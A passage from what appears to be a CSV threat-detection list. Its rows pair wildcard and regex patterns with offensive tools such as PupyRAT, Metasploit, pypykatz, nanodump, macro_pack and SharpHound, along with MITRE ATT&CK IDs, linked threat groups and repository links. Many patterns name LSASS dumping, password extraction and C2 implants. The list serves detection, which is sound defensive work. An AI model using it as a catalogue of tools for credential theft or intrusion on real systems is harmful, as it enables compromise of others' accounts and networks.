Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","20125" "*_generate_bind_payloads_password*",".{0,1000}_generate_bind_payloads_password.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20126" "*_generate_scramblesuit_passwd*",".{0,1000}_generate_scramblesuit_passwd.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - 
T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20127" "*_GetNetLoggedon.py*",".{0,1000}_GetNetLoggedon\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","20128" "*_GetPrivilege_SEDEBUG.au3*",".{0,1000}_GetPrivilege_SEDEBUG\.au3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20129" "*_iepv.zip.*",".{0,1000}_iepv\.zip\..{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20130" "*_impacket*.tar.gz*",".{0,1000}_impacket.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","20131" "*_KIWI_BCRYPT_HANDLE_KEY*",".{0,1000}_KIWI_BCRYPT_HANDLE_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20132" "*_KIWI_BCRYPT_KEY*",".{0,1000}_KIWI_BCRYPT_KEY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20133" "*_KIWI_BCRYPT_KEY81*",".{0,1000}_KIWI_BCRYPT_KEY81.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - 
Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20134" "*_KIWI_MASTERKEY_CACHE_ENTRY*",".{0,1000}_KIWI_MASTERKEY_CACHE_ENTRY.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20135" "*_lfi_rce.rb*",".{0,1000}_lfi_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20136" "*_lsass.txt*",".{0,1000}_lsass\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20137" "*_lsassdecrypt.py*",".{0,1000}_lsassdecrypt\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20138" "*_mailinthemiddle.log*",".{0,1000}_mailinthemiddle\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","20139" "*_METERPRETER_BASE_INJECT_H*",".{0,1000}_METERPRETER_BASE_INJECT_H.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20140" "*_mouse_rce.rb*",".{0,1000}_mouse_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20141" "*_msfconsole*",".{0,1000}_msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20142" "*_msfvenom*",".{0,1000}_msfvenom.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20143" "*_nimplant_*",".{0,1000}_nimplant_.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","20145" "*_NT6_CLEAR_SECRET*",".{0,1000}_NT6_CLEAR_SECRET.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20146" "*_peloader.dll*",".{0,1000}_peloader\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","20147" "*_posh-common*",".{0,1000}_posh\-common.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","20148" "*_ppl_dump.x64*",".{0,1000}_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20149" "*_ppl_dump.x64.*",".{0,1000}_ppl_dump\.x64\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20150" "*_ppl_dump_dll.x64*",".{0,1000}_ppl_dump_dll\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20151" "*_ppl_dump_dll.x86*",".{0,1000}_ppl_dump_dll\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20152" "*_ppl_medic.x64.dll*",".{0,1000}_ppl_medic\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20153" "*_ppl_medic.x64.exe*",".{0,1000}_ppl_medic\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20154" "*_ppl_medic_dll.x64.*",".{0,1000}_ppl_medic_dll\.x64\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20155" "*_prefix_PEzor_*",".{0,1000}_prefix_PEzor_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","20156" "*_processDropper2Template(*",".{0,1000}_processDropper2Template\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20157" "*_processDropperDllTemplate(*",".{0,1000}_processDropperDllTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20158" "*_processDropperTemplate(*",".{0,1000}_processDropperTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20159" "*_processEmbedDllTemplate(*",".{0,1000}_processEmbedDllTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20160" "*_processEmbedExeTemplate(*",".{0,1000}_processEmbedExeTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20161" "*_processMeterpreterTemplate(*",".{0,1000}_processMeterpreterTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20162" "*_processPowershellDropperTemplate(*",".{0,1000}_processPowershellDropperTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20163" "*_pycobalt_*",".{0,1000}_pycobalt_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - 
Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","20164" "*_REFLECTIVEDLLINJECTION_*",".{0,1000}_REFLECTIVEDLLINJECTION_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","20165" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","20166" "*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","20167" 
"*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","20168" "*_SharpHound-v*.zip*",".{0,1000}_SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 